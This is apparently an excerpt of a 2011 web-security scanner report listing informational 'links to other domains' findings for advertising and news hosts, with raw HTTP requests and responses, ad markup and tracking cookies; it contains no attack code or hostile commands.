<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=10984168&amp;advid=917232" class="t-rop-ad-anchor" target="" id="rop-ad/10984168-300x460">Pezza Realty Corporation<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11009516&amp;advid=1476013" class="t-rop-ad-anchor" target="" id="rop-ad/11009516-300x460">Phillippe Builders<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11015274&amp;advid=1426955" class="t-rop-ad-anchor" target="" id="rop-ad/11015274-300x460">Phoenix Staffing &amp; Management Systems<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11015318&amp;advid=910954" class="t-rop-ad-anchor" target="" id="rop-ad/11015318-300x460">PJ\'s Camera &amp; Photo Supply<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11015123&amp;advid=910501" class="t-rop-ad-anchor" target="" id="rop-ad/11015123-300x460">Platinum Partners Realtors<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11015168&amp;advid=1223329" class="t-rop-ad-anchor" target="" id="rop-ad/11015168-300x460">Provena McAuley Manor<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11015099&amp;advid=1251193" class="t-rop-ad-anchor" target="" id="rop-ad/11015099-300x460">Prudential Rubloff<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
ife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11009448&amp;advid=1016615" class="t-rop-ad-anchor" target="" id="rop-ad/11009448-300x460">Randall F. Summers / Richard L. Goodman / Maninder K. Sokhey<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11015327&amp;advid=910648" class="t-rop-ad-anchor" target="" id="rop-ad/11015327-300x460">RE/MAX Enterprises<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11015299&amp;advid=916284" class="t-rop-ad-anchor" target="" id="rop-ad/11015299-300x460">RE/MAX Excels<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11015120&amp;advid=910935" class="t-rop-ad-anchor" target="" id="rop-ad/11015120-300x460">RE/MAX Suburban<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=10984121&amp;advid=942987" class="t-rop-ad-anchor" target="" id="rop-ad/10984121-300x460">Red Dragon<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11009439&amp;advid=1064160" class="t-rop-ad-anchor" target="" id="rop-ad/11009439-300x460">Restaurant Week<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
ef="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11015263&amp;advid=910891" class="t-rop-ad-anchor" target="" id="rop-ad/11015263-300x460">Richard A. Kocurek Attorney At Law<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"> (3)</a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=10984173&amp;advid=911970" class="t-rop-ad-anchor" target="" id="rop-ad/10984173-300x460">Richard M. Parker, DDS<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=10984206&amp;advid=927348" class="t-rop-ad-anchor" target="" id="rop-ad/10984206-300x460">Roberto\'s Ristorante<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11015204&amp;advid=1458572" class="t-rop-ad-anchor" target="" id="rop-ad/11015204-300x460">Second Time Around Furniture<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11009523&amp;advid=1476025" class="t-rop-ad-anchor" target="" id="rop-ad/11009523-300x460">Shodeen Residential<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11009512&amp;advid=1470959" class="t-rop-ad-anchor" target="" id="rop-ad/11009512-300x460">Shraddha Sharma, M.D.<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11009525&amp;advid=1432712" class="t-rop-ad-anchor" target="" id="rop-ad/11009525-300x460">Southside Hearing Aid Center<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=10984054&amp;advid=982188" class="t-rop-ad-anchor" target="" id="rop-ad/10984054-300x460">St. John Lutheran Church<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
tp://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11009451&amp;advid=957760" class="t-rop-ad-anchor" target="" id="rop-ad/11009451-300x460">St. John\'s Lutheran Church &amp; School<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11009527&amp;advid=1429496" class="t-rop-ad-anchor" target="" id="rop-ad/11009527-300x460">St. Mary School<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=10984078&amp;advid=1022257" class="t-rop-ad-anchor" target="" id="rop-ad/10984078-300x460">St. Matthew School<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
op.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11015083&amp;advid=1445657" class="t-rop-ad-anchor" target="" id="rop-ad/11015083-300x460">St. Michael Catholic Church / Camerata Chicago<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"> (2)</a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11009436&amp;advid=1497683" class="t-rop-ad-anchor" target="" id="rop-ad/11009436-300x460">Stamp Out Hunger Food Drive<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=10984215&amp;advid=1102023" class="t-rop-ad-anchor" target="" id="rop-ad/10984215-300x460">Stonehouse Pub<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11009443&amp;advid=910531" class="t-rop-ad-anchor" target="" id="rop-ad/11009443-300x460">Strauss Tax Service<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11015200&amp;advid=1266526" class="t-rop-ad-anchor" target="" id="rop-ad/11015200-300x460">Super Open House<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"> (2)</a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11009457&amp;advid=1052934" class="t-rop-ad-anchor" target="" id="rop-ad/11009457-300x460">Susan Rogan Hearing<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11015206&amp;advid=1454280" class="t-rop-ad-anchor" target="" id="rop-ad/11015206-300x460">The Annuity Doctor<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11009530&amp;advid=915039" class="t-rop-ad-anchor" target="" id="rop-ad/11009530-300x460">The Birches<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11009398&amp;advid=1406013" class="t-rop-ad-anchor" target="" id="rop-ad/11009398-300x460">The Corner Shoppe / The Carousel Shop<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11015142&amp;advid=1379547" class="t-rop-ad-anchor" target="" id="rop-ad/11015142-300x460">The Goldmine Jewelers<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11015233&amp;advid=910944" class="t-rop-ad-anchor" target="" id="rop-ad/11015233-300x460">The Leonard Memorial Home, Ltd.<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11015308&amp;advid=916277" class="t-rop-ad-anchor" target="" id="rop-ad/11015308-300x460">The Merra-Lee Shops<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11009449&amp;advid=916318" class="t-rop-ad-anchor" target="" id="rop-ad/11009449-300x460">The Oscar Swan Country Inn<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11015154&amp;advid=911078" class="t-rop-ad-anchor" target="" id="rop-ad/11015154-300x460">The UPS Store<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=10984210&amp;advid=928199" class="t-rop-ad-anchor" target="" id="rop-ad/10984210-300x460">The Uptown Shop<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11009502&amp;advid=1470960" class="t-rop-ad-anchor" target="" id="rop-ad/11009502-300x460">The Used Car Superstore<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11009513&amp;advid=1191724" class="t-rop-ad-anchor" target="" id="rop-ad/11009513-300x460">Township of Berwyn<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11015290&amp;advid=1489485" class="t-rop-ad-anchor" target="" id="rop-ad/11015290-300x460">Tree Green Your Tree M.D.<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=10984227&amp;advid=916276" class="t-rop-ad-anchor" target="" id="rop-ad/10984227-300x460">Turnabout Pizza<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11009521&amp;advid=1360898" class="t-rop-ad-anchor" target="" id="rop-ad/11009521-300x460">United Soccer Academy<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=10984159&amp;advid=1495094" class="t-rop-ad-anchor" target="" id="rop-ad/10984159-300x460">V&amp;V Paesano Pizzeria<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=10984205&amp;advid=1235946" class="t-rop-ad-anchor" target="" id="rop-ad/10984205-300x460">Villa Medical Arts<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=10984132&amp;advid=1477004" class="t-rop-ad-anchor" target="" id="rop-ad/10984132-300x460">Villa Olivia<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
p://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11009402&amp;advid=910532" class="t-rop-ad-anchor" target="" id="rop-ad/11009402-300x460">Village of Downers Grove / Village Corner<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=10984221&amp;advid=964433" class="t-rop-ad-anchor" target="" id="rop-ad/10984221-300x460">Village of Lemont / Community Corner<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11009450&amp;advid=1437135" class="t-rop-ad-anchor" target="" id="rop-ad/11009450-300x460">Vini of Lisle<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11009427&amp;advid=1171229" class="t-rop-ad-anchor" target="" id="rop-ad/11009427-300x460">West Suburban Symphony<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11009390&amp;advid=1284118" class="t-rop-ad-anchor" target="" id="rop-ad/11009390-300x460">Westmont Park District<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11015106&amp;advid=911081" class="t-rop-ad-anchor" target="" id="rop-ad/11015106-300x460">Wheaton Meat Co., Inc.<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11015156&amp;advid=911107" class="t-rop-ad-anchor" target="" id="rop-ad/11015156-300x460">Wheaton Sport Center<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
f="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=10984239&amp;advid=912074" class="t-rop-ad-anchor" target="" id="rop-ad/10984239-300x460">Williams &amp; Williams Auctioneers<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11015314&amp;advid=911112" class="t-rop-ad-anchor" target="" id="rop-ad/11015314-300x460">Wright Orthodontics<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
13.60. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /AdServer/AdServerServlet?operId=2&pubId=25273&siteId=25277&adId=19976&kadwidth=728&kadheight=90&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://bpx.a9.com/amzn/iframe.html&frameName=http_bpx_a9_comamzniframe_htmlkomli_ads_frame12527325277&kltstamp=2011-4-12%208%3A31%3A14&ranreq=0.5169705713633448&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bpx.a9.com/amzn/iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_22=488-pcv:1|uid:2931142961646634775; KRTBCOOKIE_57=476-uid:2724386019227846218; KRTBCOOKIE_27=1216-uid:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; KRTBCOOKIE_133=1873-xrd52zkwjuxh; KRTBCOOKIE_53=424-c1e1301e-3a1f-4ca7-9870-f636b5f10e66; KADUSERCOOKIE=29E43D8F-52C5-4C7B-B2EA-0181496E6671; KRTBCOOKIE_148=1699-uid:978972DFA063000D2C0E7A380BFA1DEC; PMAT=37G1VCuXv0TgpuQmot_U9evlQ-ZwaOOPD56uOCkcTeBe18znStqcWJQ; pubtime_16486=TMC; KRTBCOOKIE_80=1336-8218888f-9a83-4760-bd14-33b4666730c0.11265.49026.49027.59012.8.50185.17163.50060.17154.50064.4625.50056.57454.10518.6551.48153.48156.48157.10656.1073.24493.39944.14769.39804.38582.1097.23864.57145.45714.57148.30653.10504.10047.17857.41538.13893.55494.; KRTBCOOKIE_58=1344-AM-00000000030620452; KRTBCOOKIE_179=2451-uid:17647108006034089; KRTBCOOKIE_16=226-uid:3419824627245671268; KRTBCOOKIE_204=3579-0c2aede6-6bb6-11e0-8fe6-0025900a8ffe; KRTBCOOKIE_200=3683-87e0a5c4e03157bf2bf35233d8beea408fe3ad97e13305ea22fd5334debaeb40; pubtime_26167=TMC; PUBRETARGET=82_1397691450.78_1397834769.1246_1397970193.1985_1307320077.362_1306098764.1039_1306254899.617_1398451593.70_1306768104.1359_1306933483.1555_1398966889.806_1336137316.1765_1307641382.79_1305212190.76_1307717967; camfreq=614-2_1305212400; pubfreq_16486=165-1; pubfreq_26167=661-2:243-10:460-1; PUBMDCID=2; PMDTSHR=; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Thu, 12 May 2011 13:33:11 GMT
Connection: close
Set-Cookie: PUBMDCID=2; domain=pubmatic.com; expires=Fri, 11-May-2012 13:32:58 GMT; path=/
Set-Cookie: pubfreq_25277=; domain=pubmatic.com; expires=Sat, 14-May-2011 13:32:58 GMT; path=/
Set-Cookie: pubtime_25277=TMC; domain=pubmatic.com; expires=Fri, 13-May-2011 13:32:58 GMT; path=/
Set-Cookie: _curtime=1305207178; domain=pubmatic.com; expires=Thu, 12-May-2011 14:42:58 GMT; path=/
Set-Cookie: pubfreq_25277_19976_856941671=243-1; domain=pubmatic.com; expires=Thu, 12-May-2011 14:12:58 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Fri, 13-May-2011 13:32:58 GMT; path=/
Content-Length: 1486

document.writeln('<'+'script type="text/javascript" src="http://ad.media6degrees.com/adserv/cs?tId=9932717481735209|cb=1305207191|adType=ad|cId=6524|ec=1|spId=32750|advId=1065|exId=22|price=3.0000|pub
...[SNIP]...
</iframe>');document.writeln('<img src="http://pixel.quantserve.com/pixel/p-5aWVS_roA1dVM.gif?labels=Entertainment_and_Leisure" style="display: none;position:absolute;top:-15000px;" border="0" height="1" width="1" alt="Quantcast"/>');
13.61. http://static.arstechnica.net//public/v6/footer.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.arstechnica.net
Path:   //public/v6/footer.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET //public/v6/footer.html?1305144886 HTTP/1.1
Host: static.arstechnica.net
Proxy-Connection: keep-alive
Referer: http://arstechnica.com/gadgets/news/2011/05/more-chromebooks-from-google-chrome-os-web-store-updates-too.ars
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: CacheFlyServe v26b
Date: Thu, 12 May 2011 13:27:51 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: max-age=604800
Expires: Thu, 19 May 2011 13:27:51 GMT
ETag: "c492f7309304bfd57839bd2d1d4bec06"
X-CF1: fE.iad2:cf:cacheC.iad2-01
Last-Modified: Tue, 03 May 2011 20:25:54 GMT
X-CF2: L
Content-Length: 12523

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<style type="text/css">

html, body {
background: #201f25;
font-family: Arial, Helvetica, sans-serif;

...[SNIP]...
<li><a href="http://www.reddit.com" title="NARWHALS!" target="_parent">Reddit</a>
...[SNIP]...
<li><a href="http://www.wired.com" target="_parent">Wired</a>
...[SNIP]...
<li><a href="http://www.vanityfair.com/" target="_parent">Vanity Fair</a>
...[SNIP]...
<li><a href="http://www.style.com/" target="_parent">Style</a>
...[SNIP]...
<li><a href="http://www.details.com/" target="_parent">Details</a>
...[SNIP]...
13.62. http://tag.admeld.com/ad/iframe/489/businesstech/300x250/businesstech_btf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/489/businesstech/300x250/businesstech_btf

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ad/iframe/489/businesstech/300x250/businesstech_btf?t=1305206897249&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer= HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9; D41U=3ZP6aPgJzYQImYO2fkBZoKF-nc31zVj-pLzxjzthWC1M8tPub3s1d8g; __qca=P0-71277472-1304957857861

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 1656
Content-Type: text/html
Date: Thu, 12 May 2011 13:28:18 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:300px;height:250px;margin:0;border:0">



...[SNIP]...
<div style="width:0;height:0">


<script type="text/javascript" src="http://admeld.lucidmedia.com/clicksense/admeld/match?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=73&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match"></script>

<img style="display:none" width="1" height="1" src="http://am.nexac.com/match?user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_dataprovider_id=5"/>

<img width="0" height="0" src="http://pix04.revsci.net/K05540/a4/0/0/0.302?tgt=http%3A%2F%2Ftag.admeld.com%2Fpixel%3Fadmeld_dataprovider_id%3D34%26_seg%3D%7Bsegs%7D&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_dataprovider_id=34&admeld_callback=http://tag.admeld.com/pixel"/>


</div>
...[SNIP]...
13.63. http://tags.bluekai.com/site/3307  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/3307

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

